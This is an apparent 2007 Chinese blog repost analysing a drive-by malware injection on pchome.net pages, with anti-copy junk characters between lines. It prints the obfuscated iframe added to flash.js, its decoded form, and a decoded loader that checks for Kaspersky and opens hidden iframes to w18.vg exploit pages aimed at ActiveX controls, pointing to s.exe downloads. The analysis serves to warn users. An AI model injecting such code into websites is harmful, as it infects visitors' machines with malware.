|
截至2007-12-28 18:17 仍未修复$ c3 u. x3 u' f( z% M: x8 S
& J' y. _4 |8 Q: w" \
! y9 u. I \! |6 z1 ~
##I#KE+X#D=$I#KE+XDI=KE+=X++D$IK#E#X+DI$KE+X=D=IK$E+$X=$D#I+$KEX$#DI+K#EXD=IKE+X#D#=I==K+E==XD+I#K$E$#X$D##I
% Z2 R" R* I; C) L: A' a$ X" U
$ P! o u7 p3 H% r0 H1 E+ s+ m! @从论坛看到的消息说pchome的某页面被挂马了,于是上去找,http://article.pchome.net/content-502393-7.html#topView, C5 ~2 r6 h4 E. Z3 z
|& M& j) c# o# T
挂得比较隐蔽,http://btn.pchome.net/flash.js的中间被加入了如下代码:: u$ A' B/ d7 R! W5 g! x" m
1 w3 b! _5 O+ p% rwindow["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]('\x3c\x69\x66\x72\x61\x6d\x65 \x68\x65\x69\x67\x68\x74\x3d\x30 \x77\x69\x64\x74\x68\x3d\x30 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x35\x39\x2e\x76\x63\x2f\x70\x61\x67\x65\x2f\x61\x64\x64\x5f\x36\x34\x34\x34\x35\x35\x2e\x68\x74\x6d\x22\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e');. u0 p( X; o- x3 c
; N |- E- u' |/ K* l
也就是这个了:
' ~" \ ]" V# ]' c
% S& U& i; n$ }) _. l* O; |window["document"]["writeln"]('<iframe height=0 width=0 src="http://www.59.vc/page/add_644455.htm"></iframe>');9 e8 E* }' ~5 ~% [8 j& U. _. O( G
0 z5 [/ [* o( Z7 q" D$ c+ a4 U但只有这个js还不会使得那个iframe生效,使得他生效的是调用这个js显示flash 的代码:
/ E8 N+ N$ j3 K# y2 k# ^) Y9 D# D* M+ o; L9 Y
<script language="javascript" type="text/javascript">
- _, }- k# V! o: _writeflashhtml("_swf=http://btn.pchome.net/pchome/20071217/300_250.swf", "_width=300", "_height=250" ,"_wmode=opaque");/ ^9 z, m) n5 m4 y1 X8 z
</script>
' p$ ` B4 ?4 R+ N c$ {- R
4 m( U4 z8 N" D4 z5 k, @有了这个,iframe就生效了;经过一番调用和解密后得:
3 d8 `- j- y5 ]$ q/ q6 w3 s- Z3 C' p' Y2 m* [. q
function bIsKIS(){for(i=2;i<26;i++){var kis6=new Image();var kis7=new Image();var root=String.fromCharCode(65+i);kis6.src="mkMSITStore:"+root+":\\Program Files\\Kaspersky Lab\\Kaspersky Internet Security 6.0\\Doc\\context.chm::/images/help.gif";kis7.src="mkMSITStore:"+root+":\\Program Files\\Kaspersky Lab\\Kaspersky Internet Security 7.0\\Doc\\context.chm::/images/help.gif";if(kis6.height==41||kis7.height==41)return true}return false}var Then=new Date();aaxxx="xxxyyyyfassssfsadfasdf";Then.setTime(Then.getTime()+24*60*60*1000);var aaffdasfascookie=new String(document.cookie);var cookieHeader="Cookie1=";aaxxx="xxxyyyyfassssfsadfasdf";if(!bIsKIS()&&aaffdasfascookie.indexOf(cookieHeader)==-1){aaxxx="xxxyyyyfassssfsadfasdf";document.cookie="Cookie1=POPWINDOS;expires="+Then.toGMTString();aaxxx="xxxyyyyfassssfsadfasdf";try{if(new ActiveXObject("IERPCtl.IERPCtl.1"))document.write('<iframe style=display:none src="http://w18.vg/real.gif"></iframe>')}catch(e){}try{if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)document.write('<iframe style=display:none src="http://w18.vg/ms.gif"></iframe>')}catch(e){}try{if(new ActiveXObject("DPClient.Vod"))document.write('<iframe style=display:none src="http://w18.vg/xl.gif"></iframe>')}catch(e){}try{if(new ActiveXObject("GLCHAT.GLChatCtrl.1"))document.write('<iframe style=display:none src="http://w18.vg/lz.gif"></iframe>')}catch(e){}try{if(new ActiveXObject("MPS.StormPlayer.1"))document.write('<iframe style=display:none src="http://w18.vg/bf.gif"></iframe>')}catch(e){}try{if(new ActiveXObject("BaiduBar.Tool.1"))document.write('<iframe style=display:none src="http://w18.vg/baidu.gif"></iframe>')}catch(e){}}4 e' R( f! u/ u [, f9 l0 q! v
+ `; r0 V5 I# j' `* I4 jK##E+XD++IK+EX=#D$IKEXD+$I#KEXDI+K$EX$DI$$KE##X#DI=K+E$X=$DI#K+#EX=DIK=E$=XDIK=$EX=DIK$E$#X=D=I##KE#=X+$D+. Q3 c1 R; P- g! _( H( f
& I7 b1 P! Z Z: @4 [( h( s$ `; C3 w2 v! f. W8 G
挑了几个解密得:http://w18.vg/s.exe7 m8 i3 h7 d2 G
% A- u+ e/ R0 r! x1 b' }: u/ S# B
从这个文件里面得到另外一个链接:http://w18.vg/ss.exe
) @1 g/ v0 Z! i: @ n/ g5 j) Y- [, k2 J! S; }- [
有点面熟的东西……
, H; N& l8 G( B4 M: t. T* F
5 `( ~$ J2 R: b e##K=E#X+D=IKE$XD$=I==K+#EXD=#I=KE$+XDI#K$=EX=D=#IK+E=X$D==I=#K=E##X$D$+IK=#EXD+IK$EX$=D+I+K#E$XD+IKEX#D, U( ?* F; k" [$ d- R5 p' @' h
+ \2 G$ R2 a* w3 a! i$ O从上面可以知道,出问题的是那个flash.js,因此所有使用这个js来放flash的页面全都有毒了!我随便找了几个页面,发现都是有毒的,这回可是大面积的被挂咯,同志们自己小心了。
- r% `* I' e. \. c1 C2 q! w; A, n0 a: K+ j/ g+ P4 [
K$EX=+DI#$KE+X#DIK$EXD$I=KE$XD+#I+KEXD=I+KE=X$D=I=KEXD#=IK==E$X=D=I#+KEXD=IK#EX#DI=K=E=X=#DIKEXDI#KE
; Z$ p' R' X: I e: [5 W8 f" g: D% b" M9 K/ b9 j- a
转载请保留声明!(http://hi.baidu.com/dikex/blog/item/36300afa339a8c889e5146f5.html) ( P. U3 P, N4 D! @+ ~
, }1 Y9 I5 l! H. U
: A& ]. \% i- }, x- G/ G8 H- L4 x9 a# @
作者dikex(六翼刺猬),原文链接:http://hi.baidu.com/dikex/blog/item/92f804c70762ead8d10060ff.html |
|